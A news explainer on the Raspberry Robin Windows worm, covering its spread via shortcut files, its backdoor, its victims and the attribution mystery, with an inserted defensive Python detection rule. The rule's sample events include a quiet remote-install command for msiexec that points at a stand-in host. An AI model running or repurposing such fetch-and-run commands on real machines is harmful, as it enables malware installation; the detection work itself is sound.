the mysterious computer worm that threatens companies, in 5 questions


A strange piece of malware is attracting growing attention and concern. It targets Windows-based devices and is able to open a door for installing other malware. Its name? Raspberry Robin, literally the raspberry robin. Red Canary researchers named it after first detecting it at their clients in September 2021. The research team of the French firm Sekoia has also studied this new threat, under the less colourful name QNAP worm.

In early July 2022, in a report spotted by Bleeping Computer, Microsoft (the publisher of Windows) explained that it had itself detected hundreds of networks affected by Raspberry Robin. The American giant therefore classified the malicious campaign [the name given to a wave of attacks, editor's note] as high risk. But while the malware meets all the conditions needed to cause potentially significant harm to its victims, researchers have so far found no sign of such activity. The mystery of this inaction casts a thick fog over the identity and intentions of the people who created and deployed it.

How does Raspberry Robin infect victims?

In jargon, Raspberry Robin falls into the category of computer worms, a term that refers to malware's ability to spread automatically to different devices connected to a network. According to Sekoia researchers, Raspberry Robin spreads without exploiting vulnerabilities [software flaws, editor's note]. Instead, it relies on legitimate Windows features to move from one machine to another.

The first infections detected by the researchers originated from connections to QNAP-branded data storage devices that the attackers had infected upstream. Since then, however, the attackers have diversified their attack infrastructure; in particular, they use infected internet boxes (ISP-provided routers) to distribute the malware in Germany.

These compromised devices contain a .lnk file [an extension used for Windows shortcuts, editor's note] that is activated automatically when the device is connected to the target computer. This file triggers Microsoft's installer to open an internet connection to the attackers' command servers, computers located remotely. This manoeuvre is unlikely to be detected, as Microsoft's tool has the permissions needed to download and run installers.
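As an added illustration (not code from the article or from the researchers it cites), the following Python rule shows how a defender could look for the pattern described above in process-creation telemetry: the Microsoft installer launched with a remote URL, or a shortcut launched from removable media. It assumes the installer's image name is msiexec.exe and that removable media mount on drive letters D: to Z:; the sample events are constructed.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Windows 4688
# style, reduced to the fields the rule needs). Not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec /q /i http://example.invalid/s/x.msi",
     "cwd": "E:\\"},
    {"pid": 2, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"msiexec /i C:\Users\bob\Downloads\7zip.msi",
     "cwd": r"C:\Users\bob"},
    {"pid": 3, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c start E:\invoice.lnk",
     "cwd": "E:\\"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumption: removable media are mounted on D: .. Z: in this environment,
# so any path on those letters is treated as "removable media context".
REMOVABLE_RE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)
INSTALLER = "msiexec.exe"  # assumed image name of the Microsoft installer


def classify(event):
    """Return the list of alert tags raised by one process-creation event."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    tags = []
    # The installer fetching a package from a remote URL is the behaviour the
    # article describes: a legitimate, trusted tool used to reach the C2.
    if image.endswith(INSTALLER) and URL_RE.search(cmd):
        tags.append("installer_fetches_remote_package")
    # A shortcut started from a removable drive is the initial trigger.
    if image.endswith("cmd.exe") and ".lnk" in cmd.lower() and REMOVABLE_RE.search(cmd):
        tags.append("shortcut_launched_from_removable_media")
    # Raise severity when either behaviour happens in a removable-media context.
    if tags and (REMOVABLE_RE.search(event["cwd"]) or REMOVABLE_RE.search(cmd)):
        tags.append("removable_media_context")
    return tags


def scan(events):
    """Map pid -> tags for every event that raised at least one alert."""
    return {e["pid"]: classify(e) for e in events if classify(e)}
```

Benign local installs (event 2) raise nothing; the rule keys on the remote URL and the removable-drive path, not on msiexec.exe itself.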

Fortunately, the USB attack mode is relatively difficult to set up, which makes it possible to rule out a large-scale infection. While not every company has a policy to prevent infection via USB drives, it is one of the best-known risks, and many employees are trained on the subject.

What does it do?

Raspberry Robin makes it possible to contaminate several machines efficiently and to open a backdoor to servers controlled by the attackers. In theory, this access can be used to deposit other malicious software on victims' machines or to exfiltrate information.

The problem is that, so far, researchers have not detected any use of the access obtained by Raspberry Robin. As a result, they do not know the final objective of the operation, nor the intentions of the criminals. The door is therefore open to speculation: are the malware's creators trying to sell their access to the victims' networks? To spy? Are they accumulating access in order to exploit it all at once? Many questions remain unanswered.

Who is affected?

According to Sekoia's research team, many networks around the world are affected; they have seen the malware at work on "several French networks" since the end of 2021. Red Canary experts also detected the first cases at the same time; the attackers targeted the networks of many of their customers, particularly in the industrial and tech sectors. In early July, Microsoft in turn found Raspberry Robin on hundreds of Windows networks.

However, the malware's target is not clearly identified, and the researchers found no consistency among the victims. Assessment is all the more difficult because the malware targets Windows systems, so its playing field is very large.

Who is behind Raspberry Robin?

This question remains a conundrum, as everything suggests that the person or group who deployed Raspberry Robin has not yet exploited its access to the infected Windows systems. Researchers therefore wonder about the nature of the malicious actors: are they just cybercriminals amusing themselves by trying new things, or a group of serious hackers, for example in the pay of a state? According to Sekoia, the worm's code is quite sophisticated, which points rather towards the second option, or at least towards a well-organised group of cybercriminals. But nothing is confirmed for now.

Usually, experts can attribute malware to a given group of criminals by cross-referencing the methods used, the infrastructure from which the attacks originate, and even the quality of the code. In the case of Raspberry Robin, more elements to analyse and more concrete actions by the attackers would be needed.

Another conundrum particularly haunts the Red Canary researchers: nobody knows where or how Raspberry Robin infects the storage devices (especially QNAPs) that serve as its entry point onto Windows systems. "This infection is likely to take place offline or at least out of our sight," the researchers say.

What to do against Raspberry Robin?

There is currently no known means of protection against Raspberry Robin. It is therefore up to companies to prevent their employees from connecting suspicious USB devices to their network. A trivial measure of digital hygiene, but one that is not always respected, as large networks are particularly complicated to monitor.

Once the damage is done, things are again unclear: researchers do not know exactly how difficult it is to uninstall Raspberry Robin from a machine. The malware is also said to distribute a file designed to resist deletion attempts.